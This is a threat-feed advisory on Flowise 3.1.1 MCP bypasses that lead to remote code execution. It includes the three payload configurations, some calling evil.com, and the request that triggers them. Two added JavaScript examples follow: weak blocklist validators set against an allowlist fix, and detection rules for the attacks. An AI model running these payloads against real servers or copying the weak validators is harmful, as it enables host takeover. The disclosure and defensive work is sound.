{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/products/flowise-components--3.1.1/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["flowise (\u003c= 3.1.1)","flowise-components (\u003c= 3.1.1)"],"_cs_severities":["high"],"_cs_tags":["execution","remote code execution","flowise"],"_cs_type":"advisory","_cs_vendors":["npm"],"content_html":"\u003cp\u003eFlowise versions 3.1.1 and earlier contain multiple security vulnerabilities in the MCP (Model Context Protocol) feature that can be exploited to achieve remote code execution (RCE). The vulnerabilities stem from insufficient input validation: the command and arguments that the Custom MCP Server node passes to the operating system are screened by blocklists, and each of the three bypasses supplies input those blocklists do not cover. An attacker with a Flowise account of any role, or with API access that has view/update permissions for chatflows, can therefore configure the Custom MCP Server with a command and arguments that pass validation. The three identified bypass methods exploit weaknesses in the handling of the \u003ccode\u003edocker build\u003c/code\u003e command, the \u003ccode\u003enpx\u003c/code\u003e command, and the \u003ccode\u003enode\u003c/code\u003e command. 
Successful exploitation allows an attacker to execute arbitrary commands on the Flowise host machine.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains access to a Flowise account with any role, or to API access with view/update permissions for chatflows.\u003c/li\u003e\n\u003cli\u003eAttacker configures the Custom MCP Server using one of the three following methods:\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDocker Build Bypass:\u003c/strong\u003e Provides \u003ccode\u003e{\u0026quot;command\u0026quot;:\u0026quot;docker\u0026quot;,\u0026quot;args\u0026quot;:[\u0026quot;build\u0026quot;,\u0026quot;https://evil.com/\u0026quot;]}\u003c/code\u003e as the Custom MCP Server configuration. Neither the \u003ccode\u003ebuild\u003c/code\u003e subcommand nor the remote URL is covered by the \u003ccode\u003evalidateCommandFlags\u003c/code\u003e blocklist, so the configuration is accepted.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eNPX --yes Bypass:\u003c/strong\u003e Provides \u003ccode\u003e{\u0026quot;command\u0026quot;:\u0026quot;npx\u0026quot;,\u0026quot;args\u0026quot;:[\u0026quot;--yes\u0026quot;,\u0026quot;malicious-package\u0026quot;]}\u003c/code\u003e. The \u003ccode\u003e--yes\u003c/code\u003e flag is not on the \u003ccode\u003evalidateCommandFlags\u003c/code\u003e blocklist, so the configuration is accepted.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eNode Command Bypass:\u003c/strong\u003e Provides \u003ccode\u003e{\u0026quot;command\u0026quot;:\u0026quot;node\u0026quot;,\u0026quot;args\u0026quot;:[\u0026quot;//evil.com/malicious.js\u0026quot;]}\u003c/code\u003e. Because the path starts with a double slash, \u003ccode\u003evalidateArgsForLocalFileAccess\u003c/code\u003e does not treat it as local file access, although the operating system resolves it as a local path.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eFor the Docker Build bypass, \u003ccode\u003edocker build \u0026lt;remote-URL\u0026gt;\u003c/code\u003e fetches a Dockerfile (or a whole build context) from the attacker-controlled address and executes its \u003ccode\u003eRUN\u003c/code\u003e instructions in a build container managed by the Docker daemon that the Flowise process can reach. That daemon normally runs as root on the host, so this is the starting point for container escape and host 
control.\u003c/li\u003e\n\u003cli\u003eFor the NPX --yes bypass, \u003ccode\u003enpx --yes malicious-package\u003c/code\u003e installs and runs the named npm package without prompting. The attacker publishes a package whose \u003ccode\u003epostinstall\u003c/code\u003e script carries the payload, so installation alone is enough for RCE on the server.\u003c/li\u003e\n\u003cli\u003eFor the Node Command bypass, the node process loads and executes code from a local file whose path begins with \u003ccode\u003e//\u003c/code\u003e, which \u003ccode\u003evalidateArgsForLocalFileAccess\u003c/code\u003e fails to recognise as local file access. The attacker first uploads a malicious JavaScript file to the server so that it exists at the referenced path.\u003c/li\u003e\n\u003cli\u003eAttacker triggers the execution of the configured MCP server via a \u003ccode\u003ePOST\u003c/code\u003e request to \u003ccode\u003e/api/v1/prediction/{chatflows_id}\u003c/code\u003e with the body \u003ccode\u003e{\u0026quot;question\u0026quot;: \u0026quot;1\u0026quot;}\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe configured command (docker, npx, or node) is executed with the attacker-supplied arguments on the Flowise server.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves remote code execution (RCE) on the Flowise server, potentially leading to full control of the host machine.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these vulnerabilities allows attackers to execute arbitrary commands on the Flowise server. This can lead to complete system compromise, data theft, and disruption of services. 
This vulnerability affects Flowise installations running vulnerable versions of the \u003ccode\u003eflowise\u003c/code\u003e and \u003ccode\u003eflowise-components\u003c/code\u003e packages, potentially impacting any organization that uses Flowise to build and run model chains.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade \u003ccode\u003eflowise\u003c/code\u003e and \u003ccode\u003eflowise-components\u003c/code\u003e to a version later than 3.1.1 that addresses the MCP security bypasses.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rules to detect potential exploitation attempts of these vulnerabilities.\u003c/li\u003e\n\u003cli\u003eReview and harden the \u003ccode\u003evalidateCommandFlags\u003c/code\u003e and \u003ccode\u003evalidateArgsForLocalFileAccess\u003c/code\u003e functions within Flowise to prevent future bypasses. Blocklists of flags and path prefixes are what failed here; an allowlist of permitted commands, packages, and script locations, applied after path normalisation, closes all three bypasses at once.\u003c/li\u003e\n\u003cli\u003eMonitor process creation and outbound network traffic on Flowise servers for \u003ccode\u003edocker build\u003c/code\u003e invocations that pull a Dockerfile or build context from a remote URL, especially from untrusted sources. The \u0026ldquo;Docker Build RCE Attempt\u0026rdquo; Sigma rule can help with this.\u003c/li\u003e\n\u003cli\u003eBlock, or at least alert on, execution of npx with the \u003ccode\u003e--yes\u003c/code\u003e argument from the Flowise process. 
The \u0026ldquo;NPX Yes RCE Attempt\u0026rdquo; Sigma rule can help detect this behavior.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-14T15:00:25Z","date_published":"2026-05-14T15:00:25Z","id":"https://feed.craftedsignal.io/briefs/2026-05-flowise-mcp-rce/","summary":"Flowise versions 3.1.1 and earlier are vulnerable to remote code execution (RCE) due to multiple MCP security bypasses, allowing attackers to execute arbitrary commands on the Flowise server by exploiting blocklist weaknesses in docker build, npx, and node command handling.","title":"Flowise MCP Security Bypass Leads to Remote Code Execution","url":"https://feed.craftedsignal.io/briefs/2026-05-flowise-mcp-rce/"}],"language":"en","title":"CraftedSignal Threat Feed — Flowise-Components (\u003c= 3.1.1)","version":"https://jsonfeed.org/version/1.1"}
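The blocklist failure described in the attack chain, next to the allowlist approach the recommendations call for, as an added example in JavaScript (Flowise is a Node.js application). This is not Flowise's code: the two weak validators are hypothetical reconstructions of the blocklist pattern, not the real validateCommandFlags and validateArgsForLocalFileAccess; the hardened validator is an example policy; and MCP_SERVER_ROOT, NPX_PACKAGE_ALLOWLIST and its single entry are assumptions chosen for this example. The weak checks accept all three payloads from the attack chain, while the hardened check rejects them and accepts only a script under the permitted directory or an allowlisted npx package.

```javascript
'use strict';
const path = require('path');

// The three Custom MCP Server configurations quoted in the attack chain above.
const DOCKER_BUILD = { command: 'docker', args: ['build', 'https://evil.com/'] };
const NPX_YES      = { command: 'npx',    args: ['--yes', 'malicious-package'] };
const NODE_SLASH   = { command: 'node',   args: ['//evil.com/malicious.js'] };

// ---- Weak, blocklist-style checks. Hypothetical reconstructions of the failure
// ---- mode, not Flowise's validateCommandFlags / validateArgsForLocalFileAccess.

// Deny a fixed set of "known bad" flags. Anything not listed (docker's `build`
// subcommand, a remote URL, npx's `--yes`) passes untouched.
const FLAG_BLOCKLIST = new Set(['-e', '--eval', '-p', '--print', '--privileged', '-v', '--volume']);
function validateCommandFlagsWeak(cfg) {
  return cfg.args.every(a => !FLAG_BLOCKLIST.has(a));
}

// Deny args that look like local paths: a single leading slash followed by a
// path character, or a dot-relative prefix. `//evil.com/malicious.js` slips
// through because its second character is a slash, yet Linux resolves the
// path as /evil.com/malicious.js.
function validateArgsForLocalFileAccessWeak(cfg) {
  return cfg.args.every(a => !/^\/[^/]/.test(a) && !/^\.\.?\//.test(a));
}

// ---- Hardened, allowlist-style check (hypothetical policy, operator-tuned).

const MCP_SERVER_ROOT = '/opt/flowise/mcp-servers';                                   // assumed location
const NPX_PACKAGE_ALLOWLIST = new Set(['@modelcontextprotocol/server-filesystem']);   // example entry

// Normalise first (collapses `//`, `.` and `..`), then require containment.
// Returns the resolved path, or null when it escapes MCP_SERVER_ROOT.
function resolveInsideRoot(p) {
  const resolved = path.posix.resolve(MCP_SERVER_ROOT, p);
  const rel = path.posix.relative(MCP_SERVER_ROOT, resolved);
  if (rel === '' || rel === '..' || rel.startsWith('../') || path.posix.isAbsolute(rel)) return null;
  return resolved;
}

// Returns { ok: true, argv } for an accepted configuration, { ok: false, reason } otherwise.
function validateMcpConfigHardened(cfg) {
  const command = cfg && cfg.command;
  const args = (cfg && cfg.args) || [];
  if (!Array.isArray(args) || !args.every(a => typeof a === 'string')) {
    return { ok: false, reason: 'args must be an array of strings' };
  }
  switch (command) {
    case 'node': {
      // The first arg must be a script inside the root, so node's own flags
      // (-e, --eval, -r, --require, ...) can never be reached.
      if (args.length === 0 || args[0].startsWith('-')) {
        return { ok: false, reason: 'node: first argument must be a script path' };
      }
      const script = resolveInsideRoot(args[0]);
      if (script === null) return { ok: false, reason: `node: script outside ${MCP_SERVER_ROOT}` };
      return { ok: true, argv: [command, script, ...args.slice(1)] };
    }
    case 'npx': {
      // The first arg must be an allowlisted package name, so npx's own flags
      // (--yes, -y, -c, -p) cannot precede it; later args go to the package.
      if (!NPX_PACKAGE_ALLOWLIST.has(args[0])) {
        return { ok: false, reason: 'npx: package not on the allowlist' };
      }
      return { ok: true, argv: [command, ...args] };
    }
    default:
      // docker, sh, python, ... are not allowlisted at all.
      return { ok: false, reason: `command not allowlisted: ${String(command)}` };
  }
}

// Show the contrast for the three payloads and one benign configuration.
function verdicts() {
  const benign = { command: 'node', args: ['servers/echo.js'] };
  return [DOCKER_BUILD, NPX_YES, NODE_SLASH, benign].map(cfg => ({
    config: JSON.stringify(cfg),
    weakBlocklistPasses: validateCommandFlagsWeak(cfg) && validateArgsForLocalFileAccessWeak(cfg),
    hardened: validateMcpConfigHardened(cfg),
  }));
}

for (const v of verdicts()) console.log(v);
```

The design point is that the hardened check never inspects flags at all: by fixing what the first argument must be (a script under a known directory, or a package name from a list), every flag to node or npx becomes unreachable, and path normalisation before the containment test removes the double-slash and dot-dot tricks in one step.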
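Detection logic for the three bypasses, run over constructed process-creation events, as an added example in JavaScript. It is not CraftedSignal's Sigma rules, which the brief references but does not reproduce; the first two rule names reuse the Sigma rule titles the recommendations mention, and the third is this example's own. It generalises slightly beyond the brief: the npx rule also matches the `-y` alias of `--yes`, the docker rule also matches git and ssh build contexts, and npx invoked through node's npx-cli.js is recognised alongside a direct npx image. The field names follow the Sigma process_creation convention and the sample events are constructed, not captured telemetry.

```javascript
'use strict';

// Constructed Linux process-creation events (not real telemetry). Field names
// follow the Sigma process_creation log source: Image, CommandLine, ParentImage.
// The first three are the brief's payloads as they would appear once spawned by
// the Flowise (node) process; the last three are benign look-alikes.
const SAMPLE_EVENTS = [
  { pid: 101, ParentImage: '/usr/bin/node', Image: '/usr/bin/docker',
    CommandLine: 'docker build https://evil.com/' },
  { pid: 102, ParentImage: '/usr/bin/node', Image: '/usr/bin/node',
    CommandLine: 'node /usr/lib/node_modules/npm/bin/npx-cli.js --yes malicious-package' },
  { pid: 103, ParentImage: '/usr/bin/node', Image: '/usr/bin/node',
    CommandLine: 'node //evil.com/malicious.js' },
  { pid: 104, ParentImage: '/bin/bash', Image: '/usr/bin/docker',
    CommandLine: 'docker build -t myapp:latest .' },
  { pid: 105, ParentImage: '/bin/bash', Image: '/usr/bin/npx',
    CommandLine: 'npx prettier --check src' },
  { pid: 106, ParentImage: '/usr/bin/pm2', Image: '/usr/bin/node',
    CommandLine: 'node /opt/flowise/packages/server/dist/index.js' },
];

const basename = p => p.split('/').pop();
const argv = ev => ev.CommandLine.trim().split(/\s+/);

// Rule 1: `docker build` whose context is a remote URL or git reference rather
// than a local directory. A local path such as `.` does not match.
function matchDockerBuildRemote(ev) {
  if (basename(ev.Image) !== 'docker') return false;
  const a = argv(ev);
  if (!a.includes('build')) return false;
  return a.some(t => /^(https?|git|ssh):\/\//i.test(t) || /^git@/.test(t) || /\.git(#.*)?$/.test(t));
}

// Rule 2: npx run with --yes or its -y alias, which auto-installs whatever
// package follows. npx may appear as its own Image or as npx-cli.js under node.
function matchNpxYes(ev) {
  const a = argv(ev);
  const viaNpx = basename(ev.Image) === 'npx' || a.some(t => /(^|\/)npx(-cli\.js)?$/.test(t));
  return viaNpx && a.some(t => t === '--yes' || t === '-y');
}

// Rule 3: node given a script path that starts with a double slash, the shape
// used to slip past a local-file-access check.
function matchNodeDoubleSlash(ev) {
  if (basename(ev.Image) !== 'node') return false;
  return argv(ev).slice(1).some(t => /^\/\/[^/]/.test(t));
}

const RULES = [
  ['Docker Build RCE Attempt', matchDockerBuildRemote],
  ['NPX Yes RCE Attempt', matchNpxYes],
  ['Node Double-Slash Path RCE Attempt', matchNodeDoubleSlash],
];

// Evaluate every rule against one event; also flag whether a node process (the
// shape of a Flowise-spawned MCP server) is the parent, for triage.
function detect(ev) {
  return {
    pid: ev.pid,
    spawnedByNode: basename(ev.ParentImage) === 'node',
    hits: RULES.filter(([, fn]) => fn(ev)).map(([name]) => name),
  };
}

// Returns only the events that matched at least one rule.
function runDetections(events) {
  return events.map(detect).filter(r => r.hits.length > 0);
}

for (const r of runDetections(SAMPLE_EVENTS)) console.log(r);
```

On a real host the parent-process condition is worth promoting from enrichment to a filter: `docker build` from an operator's shell is routine, while `docker build` spawned by the node process that runs Flowise is not.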